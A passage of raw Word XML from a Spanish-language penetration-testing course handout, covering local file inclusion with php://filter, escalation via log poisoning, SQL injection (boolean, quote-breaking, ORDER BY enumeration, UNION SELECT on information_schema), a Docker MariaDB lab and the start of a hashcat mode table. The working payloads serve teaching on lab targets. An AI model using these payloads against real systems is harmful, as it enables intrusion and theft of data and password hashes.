        <w:t>Y en otro terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC3304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curl -s 'http://10.0.2.2:9090/index.php?lang=es'        # OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6420947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curl -s 'http://10.0.2.2:9090/index.php?lang=php://filter/convert.base64-encode/resource=config'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EDB184" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61D72353" w14:textId="63A60FB7" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="2E7D32"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">✓ Autoevaluación: ¿por qué los wrappers php:// hacen falta cuando la extensión .php se concatena? ¿Funcionaría si en index.php sustituimos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>include</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>); sin concatenar?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE3CCD6" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57"/>
    <w:p w14:paraId="157308B6"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spacing w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>BLOQUE 3 — DE LFI A RCE: INCLUSIÓN DE FICHEROS CONTROLABLES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7921F49F" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Leer ficheros está bien; ejecutarlos es mejor. La idea: si consigues ESCRIBIR contenido PHP en un fichero que la víctima incluya, consigues RCE (Remote Code Execution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B2750B"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Tres caminos típicos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2740F573" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Logs del servidor web — accesibles por el proceso PHP y donde tú puedes inyectar texto vía cabeceras.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0214F713" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Cookies de sesión PHP — el fichero de sesión guarda variables que controlas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79575383" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Uploads — si la app guarda archivos en una ruta predecible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262BD0F7" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79FC4E3F"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Idea general del envenenamiento de logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F52C1C4" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>El servidor web (Apache, nginx, …) registra cada petición en un log. Las cabeceras que tú controlas (User-Agent, Referer, X-Forwarded-For) acaban literalmente escritas en ese log. Si la LFI llega al log y el log se interpreta como PHP, el código que enviaste por cabecera se ejecuta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DACA8CB" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E07837" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="F0A22E"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FCECD5"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="845209"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>⚠ La pega no es la idea, sino los detalles. Cada servidor escapa caracteres ‘peligrosos’ a su manera antes de escribir al log: comillas, saltos de línea, caracteres no imprimibles. Tu payload puede llegar reescrito y dejar de ser PHP válido. Cuando un payload no dispara, lo primero que haces es leer el log y comparar BYTE a BYTE lo enviado con lo escrito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F056CF" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32707AB2" w14:textId="13D455E8" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>El ejercicio queda como exploración: con la imagen de PHP+Apache del ejemplo anterior, intenta tú envenenar /var/log/apache2/access.log y dispararlo vía LFI. Identifica qué se reescribe y qué no.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA8B609" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201FD8A8" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="2E7D32"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>✓ Autoevaluación: si el servidor reemplaza ‘&lt;’ por ‘&amp;lt;’ en el log, ¿qué le pasa a tu payload &lt;?php ... ?&gt;? ¿Cómo lo detectarías sin necesidad de probar el ataque?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F952C1D" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57"/>
    <w:p w14:paraId="7B789AF0"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spacing w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>BLOQUE 4 — SQL INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDCDE86"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Patrón vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2051B14B" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Una aplicación es vulnerable a SQLi cuando concatena datos del usuario dentro de una sentencia SQL sin parametrizar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49883483" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="790B525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Python+sqlite, MAL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4262305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uid = request.args['uid']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE4582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cur.execute(f"SELECT * FROM accounts WHERE id = {uid}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1215FFD9"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7104E61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Petición legítima:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FC24B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GET /account?uid=42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1AA12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SELECT * FROM accounts WHERE id = 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A5595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0D61485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Inyección clásica boolean:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6820A3A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GET /account?uid=42 OR 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4733B934"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SELECT * FROM accounts WHERE id = 42 OR 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2654D0D1"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devuelve TODAS las filas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDB9BFF" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10974C20"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Inyección en cadenas de texto (escapando comillas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17503075" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Si el parámetro está dentro de comillas, primero hay que CERRARLAS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE56C1B" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A5FC14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Plantilla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4685E92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f"SELECT * FROM users WHERE name = '{name}'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4D5CE6"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24F1A91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Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F0A069"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?name=anything' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B46B9CE"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SELECT * FROM users WHERE name = 'anything' OR '1'='1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4352EFA0" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A3A3DD"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UNION SELECT — extracción de columnas adicionales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D22D40" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Si la consulta vulnerable es un SELECT, puedes ‘pegar’ con UNION otra consulta que devuelva datos de OTRAS tablas. Dos reglas que se cumplen siempre:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651ED387" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>El número de columnas del UNION debe coincidir con el del SELECT original.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA5D5BB" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Los tipos compatibles columna a columna (los motores suelen convertir, pero no siempre).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77055227" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222D9F9A" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Para descubrir el número de columnas se usa ORDER BY N de forma incremental hasta que la consulta falla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B508CF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lastRenderedPageBreak/>
        <w:t>?uid=42 ORDER BY 1-- -    → OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3CDE8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?uid=42 ORDER BY 2-- -    → OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763107F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?uid=42 ORDER BY 3-- -    → OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520AF6A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?uid=42 ORDER BY 4-- -    → error → hay 3 columnas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A63F5D" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D99792" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Y entonces se monta el UNION con 3 columnas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B988C2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?uid=42 UNION SELECT 1, table_name, 3 FROM information_schema.tables-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6644FB38" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F6691BF" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="F0A22E"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FCECD5"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="845209"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="845209"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>⚠ El comentario -- (dos guiones + espacio + cualquier carácter) es imprescindible para que el motor ignore el resto de la sentencia original. En MySQL/MariaDB hay que poner ‘-- -’ (con un carácter después del espacio) o ‘#’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5040E423" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57"/>
    <w:p w14:paraId="295962DB" w14:textId="115B91BA" w:rsidR="00864C5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spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>Mini-laboratorio para probar UNION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793208B8" w14:textId="77777777" w:rsidR="00864C57" w:rsidRPr="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57"/>
    <w:p w14:paraId="1326D46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docker run --rm -d -p 9091:80 --name sqli-demo \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AFF87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-e MARIADB_ROOT_PASSWORD=demo mariadb:11.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DBE724"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docker exec -i sqli-demo mariadb -uroot -pdemo &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3F17D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CREATE DATABASE shop;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22832D36"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USE shop;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6A45B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CREATE TABLE accounts (id INT, owner VARCHAR(64), email VARCHAR(120));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11022454"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INSERT INTO accounts VALUES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3854A1"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(42, 'alice', 'alice@example.com'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E135B1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(43, 'bob',   'bob@example.com');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479B2AF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EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CC5838" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="086113F2" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora puedes conectarte a la BBDD desde tu Kali y practicar UNION directamente con el cliente mariadb (no es exactamente un ataque vía HTTP, pero es el método más limpio para entender la mecánica).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E57DCC" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F46D5DA" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="2E7D32"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>✓ Autoevaluación: si la consulta original es SELECT id, owner, email FROM accounts WHERE id = {uid}, monta un UNION que extraiga las primeras 5 contraseñas hasheadas de una tabla users(id, login, password_hash). ¿Qué función built-in usarías para volcar el listado completo de tablas?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE9D5DA"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BLOQUE 5 — CRACKING DE HASHES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BDFC71"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r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>Identificar el tipo de hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8864D6" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57"/>
    <w:p w14:paraId="078A3247" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Antes de craquear, identifica. La pista visual rápida:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73929F2A" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>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483"/>
        <w:gridCol w:w="3492"/>
        <w:gridCol w:w="2653"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="68A6AC5C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0A22E"/>
          </w:tcPr>
          <w:p w14:paraId="5BB77C3F" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Aspecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0A22E"/>
          </w:tcPr>
          <w:p w14:paraId="29266E68" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Probable algoritmo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0A22E"/>
          </w:tcPr>
          <w:p w14:paraId="42664660" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Modo hashcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="0B47D139" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="5D2F3D4E" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>32 hex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="784FCB26" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="28316DA3" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="79814910" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5D32245D" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>40 hex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="67A9E783" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>SHA-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7C2383B9" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="5BE45B39" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="6FDCEA90" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>64 hex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="091F8AFB" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="1A236B9E" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>1400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="5AB2A641" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="628C76D7" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>$2y$.../$2a$...$2b$...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="41B80DD7" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>bcrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4CF7D4FC" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
